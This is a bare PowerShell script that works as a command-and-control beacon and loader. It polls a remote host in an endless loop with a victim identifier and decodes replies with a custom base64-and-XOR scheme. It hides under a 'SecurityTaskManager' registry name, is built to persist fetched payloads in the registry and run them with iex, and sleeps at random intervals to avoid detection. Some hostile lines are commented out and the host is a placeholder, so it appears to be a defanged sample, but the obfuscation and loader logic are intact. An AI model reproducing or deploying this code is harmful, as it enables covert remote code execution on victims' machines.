 $asc_enc_TXT=[System.Text.Encoding]::ASCII;
 $jd = $null;
 $jp=$null;
 $stmVar = "SecurityTaskManager";
 function getPropFrom_idx([string]$ARR_bs2) {
     $ARR_bs=[System.Convert]::FromBase64String($ARR_bs2);
 
     $st=$asc_enc_TXT.GetBytes('Get-ItemPropertyValue');
     $ed=$ARR_bs[0..4];
 
     $i=0;
     $l=$ed.Length;
     $k=@();
 
     [array]::Resize([ref]$k,$st.length);
     foreach($b in $st) {$k[$i++]=$b -bxor $ed[$i%$l]}
 
     $bs=$ARR_bs[5..$ARR_bs.length];
 
     $i=0;
     $l=$k.Length;
     $dt=@();
 
     [array]::Resize([ref]$dt,$bs.length);
     foreach($b in $bs) {$dt[$i++]=$b -bxor $k[$i%$l]}
 
     return $asc_enc_TXT.GetString($dt) | ConvertFrom-Json;
 }
 
 $d = "example.com";
 $ep = "WyIzMzc4NzU2ODM1ODAyNzkzMDAiLDE2NTYzNTk2NTdd";
 
 
 try {
     $jp=$asc_enc_TXT.GetString([System.Convert]::FromBase64String($ep)) | ConvertFrom-Json;
 } catch{}
 
 $v = "0"; $gbrPath = "HKCU:\Software\NeuberGbR\"; $is=$jp[1];
 $u=$jp[0];
 
 $lv = "14";
 

 $a = $asc_enc_TXT;
 
 while($true) {
     try {
         try {
             if (!(Test-Path $gbrPath)) {
                 # New-Item -Path $gbrPath | Out-Null;
             }
         }catch{}
 
         $ex = $false;
 
         if ($jd -eq $null) {
             try {
                 $r = Get-ItemPropertyValue -Path $gbrPath -Name $stmVar;
                 # $jd = getPropFrom_idx($r);
 
                 $v = $jd[0];
 
                 $ex = $true;
             }catch{}
         } else {
             $v = $jd[0];
         }
 
         try {
             $dt = wget "https://$d/x?u=$u&is=$is&lv=$lv&rv=$v" -UseBasicParsing;
             $jd2 = getPropFrom_idx($dt);
             if ($jd2[0] -gt $v) {
                 $v2 = $jd2[0];
 
                 # New-ItemProperty -Path $gbrPath -Name $stmVar -Value $dt -PropertyType "String" -Force | Out-Null;
                 $jd = $jd2;
                 $ex = $true;
             }
         }catch{}
 
         if ($ex -eq $true) {
             try{
                 stop;
             }catch{}
 
             try {
                 # iex $jd[1];
             }catch{}
         }
     } catch{}
 
     try {
         $sls = ((get-random 70 -minimum 50)*60);
         $ts = [int](Get-Date -UFormat %s);
 
         :sl while($true) {
             try{
                 # run($d,$u,$is);
             }catch{}
 
             Start-Sleep (get-random 65 -minimum 25);
             $ts2 = [int](Get-Date -UFormat %s);
 
             if (($ts2-$ts) -gt $sls) {
                 break sl;
             }
         }
     } catch{}
}